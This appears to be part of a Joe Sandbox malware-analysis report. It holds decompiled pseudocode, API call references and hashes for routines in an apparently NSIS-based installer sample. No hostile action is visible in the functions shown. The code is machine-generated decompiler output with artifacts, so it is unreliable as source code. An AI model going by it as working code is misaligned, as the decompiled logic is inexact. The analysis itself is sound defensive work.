                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E00401E4E(intOrPtr __edx) {
                                                				void* __edi;
                                                				int _t9;
                                                				signed char _t15;
                                                				struct HFONT__* _t18;
                                                				intOrPtr _t30;
                                                				void* _t31;
                                                				struct HDC__* _t33;
                                                				void* _t35;
                                                
                                                				_t30 = __edx;
                                                				_t33 = GetDC( *(_t35 - 8));
                                                				_t9 = E00402D84(2);
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                				ReleaseDC( *(_t35 - 8), _t33);
                                                				 *0x40ce00 = E00402D84(3);
                                                				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				 *0x40ce07 = 1;
                                                				 *0x40ce04 = _t15 & 0x00000001;
                                                				 *0x40ce05 = _t15 & 0x00000002;
                                                				 *0x40ce06 = _t15 & 0x00000004;
                                                				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                				_t18 = CreateFontIndirectW(0x40cdf0);
                                                				_push(_t18);
                                                				_push(_t31);
                                                				E00406484();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}











                                                0x00401e4e
                                                0x00401e59
                                                0x00401e5b
                                                0x00401e68
                                                0x00401e7f
                                                0x00401e84
                                                0x00401e91
                                                0x00401e96
                                                0x00401e9a
                                                0x00401ea5
                                                0x00401eac
                                                0x00401ebe
                                                0x00401ec4
                                                0x00401ec9
                                                0x00401ed3
                                                0x00402638
                                                0x0040156d
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                • ReleaseDC.USER32 ref: 00401E84
                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll,00000000), ref: 00406779
                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401C43(intOrPtr __edx) {
                                                				int _t29;
                                                				long _t30;
                                                				signed int _t32;
                                                				WCHAR* _t35;
                                                				long _t36;
                                                				int _t41;
                                                				signed int _t42;
                                                				int _t46;
                                                				int _t56;
                                                				intOrPtr _t57;
                                                				struct HWND__* _t63;
                                                				void* _t64;
                                                
                                                				_t57 = __edx;
                                                				_t29 = E00402D84(3);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 - 0x18) = _t29;
                                                				_t30 = E00402D84(4);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 + 8) = _t30;
                                                				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                				}
                                                				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                					 *(_t64 + 8) = E00402DA6(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t61 = E00402DA6();
                                                					_t32 = E00402DA6();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t35 =  ~( *_t31) & _t61;
                                                					__eflags = _t35;
                                                					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                					goto L10;
                                                				} else {
                                                					_t63 = E00402D84();
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t41 = E00402D84(2);
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t56 =  *(_t64 - 0x1c) >> 2;
                                                					if(__eflags == 0) {
                                                						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                						L10:
                                                						 *(_t64 - 0x38) = _t36;
                                                					} else {
                                                						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                					_push( *(_t64 - 0x38));
                                                					E00406484();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                				return 0;
                                                			}















                                                0x00401c43
                                                0x00401c45
                                                0x00401c4c
                                                0x00401c4f
                                                0x00401c52
                                                0x00401c5c
                                                0x00401c60
                                                0x00401c63
                                                0x00401c6c
                                                0x00401c6c
                                                0x00401c6f
                                                0x00401c73
                                                0x00401c7c
                                                0x00401c7c
                                                0x00401c7f
                                                0x00401c83
                                                0x00401c85
                                                0x00401cda
                                                0x00401cdc
                                                0x00401ce7
                                                0x00401cf1
                                                0x00401cf4
                                                0x00401cf4
                                                0x00401cfd
                                                0x00000000
                                                0x00401c87
                                                0x00401c8e
                                                0x00401c90
                                                0x00401c93
                                                0x00401c99
                                                0x00401ca0
                                                0x00401ca3
                                                0x00401ccb
                                                0x00401d03
                                                0x00401d03
                                                0x00401ca5
                                                0x00401cb3
                                                0x00401cbb
                                                0x00401cbe
                                                0x00401cbe
                                                0x00401ca3
                                                0x00401d06
                                                0x00401d09
                                                0x00401d0f
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v68;
                                                				char _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				signed int _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t55;
                                                
                                                				_t23 = _a16;
                                                				_t53 = _a12;
                                                				_t44 = 0xffffffdc;
                                                				if(_t23 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t24 = _t53;
                                                					if(_t53 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t44 = 0xffffffdd;
                                                					}
                                                					if(_t53 < 0x400) {
                                                						_t44 = 0xffffffde;
                                                					}
                                                					if(_t53 < 0xffff3333) {
                                                						_t52 = 0x14;
                                                						asm("cdq");
                                                						_t24 = 1 / _t52 + _t53;
                                                					}
                                                					_t25 = _t24 & 0x00ffffff;
                                                					_t55 = _t24 >> 0;
                                                					_t46 = 0xa;
                                                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                				} else {
                                                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                					_t50 = 0;
                                                				}
                                                				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                			}



















                                                0x00404d4f
                                                0x00404d54
                                                0x00404d5c
                                                0x00404d5d
                                                0x00404d6a
                                                0x00404d72
                                                0x00404d73
                                                0x00404d75
                                                0x00404d77
                                                0x00404d79
                                                0x00404d7c
                                                0x00404d7c
                                                0x00404d83
                                                0x00404d89
                                                0x00404d89
                                                0x00404d90
                                                0x00404d97
                                                0x00404d9a
                                                0x00404d9d
                                                0x00404d9d
                                                0x00404da1
                                                0x00404db1
                                                0x00404db3
                                                0x00404db6
                                                0x00404d5f
                                                0x00404d5f
                                                0x00404d66
                                                0x00404d66
                                                0x00404dbe
                                                0x00404dc9
                                                0x00404ddf
                                                0x00404df0
                                                0x00404e0c

                                                APIs
                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                • wsprintfW.USER32 ref: 00404DF0
                                                • SetDlgItemTextW.USER32 ref: 00404E03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405EB7(WCHAR* _a4) {
                                                				WCHAR* _t5;
                                                				short* _t7;
                                                				WCHAR* _t10;
                                                				short _t11;
                                                				WCHAR* _t12;
                                                				void* _t14;
                                                
                                                				_t12 = _a4;
                                                				_t10 = CharNextW(_t12);
                                                				_t5 = CharNextW(_t10);
                                                				_t11 =  *_t12;
                                                				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                                					if(_t11 != 0x5c || _t12[1] != _t11) {
                                                						L10:
                                                						return 0;
                                                					} else {
                                                						_t14 = 2;
                                                						while(1) {
                                                							_t14 = _t14 - 1;
                                                							_t7 = E00405E39(_t5, 0x5c);
                                                							if( *_t7 == 0) {
                                                								goto L10;
                                                							}
                                                							_t5 = _t7 + 2;
                                                							if(_t14 != 0) {
                                                								continue;
                                                							}
                                                							return _t5;
                                                						}
                                                						goto L10;
                                                					}
                                                				} else {
                                                					return CharNextW(_t5);
                                                				}
                                                			}









                                                0x00405ec0
                                                0x00405ec7
                                                0x00405eca
                                                0x00405ecc
                                                0x00405ed2
                                                0x00405eea
                                                0x00405f0c
                                                0x00000000
                                                0x00405ef2
                                                0x00405ef4
                                                0x00405ef5
                                                0x00405ef8
                                                0x00405ef9
                                                0x00405f02
                                                0x00000000
                                                0x00000000
                                                0x00405f05
                                                0x00405f08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405f08
                                                0x00000000
                                                0x00405ef5
                                                0x00405ee1
                                                0x00000000
                                                0x00405ee2

                                                APIs
                                                • CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                • CharNextW.USER32(00000000), ref: 00405ECA
                                                • CharNextW.USER32(00000000), ref: 00405EE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: C:\
                                                • API String ID: 3213498283-3404278061
                                                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                • Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
                                                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                • Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00405E0C(WCHAR* _a4) {
                                                				WCHAR* _t9;
                                                
                                                				_t9 = _a4;
                                                				_push( &(_t9[lstrlenW(_t9)]));
                                                				_push(_t9);
                                                				if( *(CharPrevW()) != 0x5c) {
                                                					lstrcatW(_t9, 0x40a014);
                                                				}
                                                				return _t9;
                                                			}




                                                0x00405e0d
                                                0x00405e1a
                                                0x00405e1b
                                                0x00405e26
                                                0x00405e2e
                                                0x00405e2e
                                                0x00405e36

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3936084776
                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E735410E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                				void* _v0;
                                                				void* _t27;
                                                				signed int _t29;
                                                				void* _t30;
                                                				void* _t34;
                                                				void* _t36;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t63;
                                                				void* _t64;
                                                				signed int _t66;
                                                				void* _t67;
                                                				void* _t73;
                                                				void* _t74;
                                                				void* _t77;
                                                				void* _t80;
                                                				void _t81;
                                                				void _t82;
                                                				intOrPtr _t84;
                                                				void* _t86;
                                                				void* _t88;
                                                
                                                				 *0x7354506c = _a8;
                                                				 *0x73545070 = _a16;
                                                				 *0x73545074 = _a12;
                                                				_a12( *0x73545048, E73541651, _t73);
                                                				_t66 =  *0x7354506c +  *0x7354506c * 4 << 3;
                                                				_t27 = E735412E3();
                                                				_v0 = _t27;
                                                				_t74 = _t27;
                                                				if( *_t27 == 0) {
                                                					L28:
                                                					return GlobalFree(_t27);
                                                				}
                                                				do {
                                                					_t29 =  *_t74 & 0x0000ffff;
                                                					_t67 = 2;
                                                					_t74 = _t74 + _t67;
                                                					_t88 = _t29 - 0x66;
                                                					if(_t88 > 0) {
                                                						_t30 = _t29 - 0x6c;
                                                						if(_t30 == 0) {
                                                							L23:
                                                							_t31 =  *0x73545040;
                                                							if( *0x73545040 == 0) {
                                                								goto L26;
                                                							}
                                                							E73541603( *0x73545074, _t31 + 4, _t66);
                                                							_t34 =  *0x73545040;
                                                							_t86 = _t86 + 0xc;
                                                							 *0x73545040 =  *_t34;
                                                							L25:
                                                							GlobalFree(_t34);
                                                							goto L26;
                                                						}
                                                						_t36 = _t30 - 4;
                                                						if(_t36 == 0) {
                                                							L13:
                                                							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E73541312(E7354135A(_t38));
                                                							L14:
                                                							goto L25;
                                                						}
                                                						_t40 = _t36 - _t67;
                                                						if(_t40 == 0) {
                                                							L11:
                                                							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E73541381(_t80, E735412E3());
                                                							goto L14;
                                                						}
                                                						L8:
                                                						if(_t40 == 1) {
                                                							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                							_t10 = _t81 + 4; // 0x4
                                                							E73541603(_t10,  *0x73545074, _t66);
                                                							_t86 = _t86 + 0xc;
                                                							 *_t81 =  *0x73545040;
                                                							 *0x73545040 = _t81;
                                                						}
                                                						goto L26;
                                                					}
                                                					if(_t88 == 0) {
                                                						_t48 =  *0x73545070;
                                                						_t77 =  *_t48;
                                                						 *_t48 =  *_t77;
                                                						_t49 = _v0;
                                                						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                							E73541603(_t49, _t77 + 8, 0x38);
                                                							_t86 = _t86 + 0xc;
                                                						}
                                                						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                						GlobalFree(_t77);
                                                						goto L26;
                                                					}
                                                					_t54 = _t29 - 0x46;
                                                					if(_t54 == 0) {
                                                						_t82 = GlobalAlloc(0x40,  *0x7354506c +  *0x7354506c + 8);
                                                						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                						_t14 = _t82 + 8; // 0x8
                                                						E73541603(_t14, _v0, 0x38);
                                                						_t86 = _t86 + 0xc;
                                                						 *_t82 =  *( *0x73545070);
                                                						 *( *0x73545070) = _t82;
                                                						goto L26;
                                                					}
                                                					_t63 = _t54 - 6;
                                                					if(_t63 == 0) {
                                                						goto L23;
                                                					}
                                                					_t64 = _t63 - 4;
                                                					if(_t64 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L13;
                                                					}
                                                					_t40 = _t64 - _t67;
                                                					if(_t40 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L11;
                                                					}
                                                					goto L8;
                                                					L26:
                                                				} while ( *_t74 != 0);
                                                				_t27 = _v0;
                                                				goto L28;
                                                			}


























                                                0x735410eb
                                                0x73541100
                                                0x73541109
                                                0x7354110e
                                                0x73541119
                                                0x7354111c
                                                0x73541125
                                                0x73541129
                                                0x7354112b
                                                0x735412b0
                                                0x735412ba
                                                0x735412ba
                                                0x73541132
                                                0x73541132
                                                0x73541137
                                                0x73541138
                                                0x7354113a
                                                0x7354113d
                                                0x73541256
                                                0x73541259
                                                0x73541271
                                                0x73541271
                                                0x73541278
                                                0x00000000
                                                0x00000000
                                                0x73541285
                                                0x7354128a
                                                0x7354128f
                                                0x73541294
                                                0x7354129a
                                                0x7354129b
                                                0x00000000
                                                0x7354129b
                                                0x7354125b
                                                0x7354125e
                                                0x735411bc
                                                0x735411bf
                                                0x735411c2
                                                0x735411cb
                                                0x735411d0
                                                0x00000000
                                                0x735411d1
                                                0x73541264
                                                0x73541266
                                                0x735411a2
                                                0x735411a5
                                                0x735411a8
                                                0x735411b1
                                                0x00000000
                                                0x735411b1
                                                0x73541164
                                                0x73541165
                                                0x73541177
                                                0x73541180
                                                0x73541184
                                                0x7354118e
                                                0x73541191
                                                0x73541193
                                                0x73541193
                                                0x00000000
                                                0x73541165
                                                0x73541143
                                                0x73541218
                                                0x7354121d
                                                0x73541221
                                                0x73541223
                                                0x7354122c
                                                0x7354122f
                                                0x73541238
                                                0x7354123d
                                                0x7354123d
                                                0x73541247
                                                0x7354124a
                                                0x00000000
                                                0x73541250
                                                0x73541149
                                                0x7354114c
                                                0x735411e9
                                                0x735411ed
                                                0x735411f7
                                                0x735411fb
                                                0x73541205
                                                0x7354120a
                                                0x73541211
                                                0x00000000
                                                0x73541211
                                                0x73541152
                                                0x73541155
                                                0x00000000
                                                0x00000000
                                                0x7354115b
                                                0x7354115e
                                                0x735411b8
                                                0x00000000
                                                0x735411b8
                                                0x73541160
                                                0x73541162
                                                0x7354119e
                                                0x00000000
                                                0x7354119e
                                                0x00000000
                                                0x735412a1
                                                0x735412a1
                                                0x735412ab
                                                0x00000000

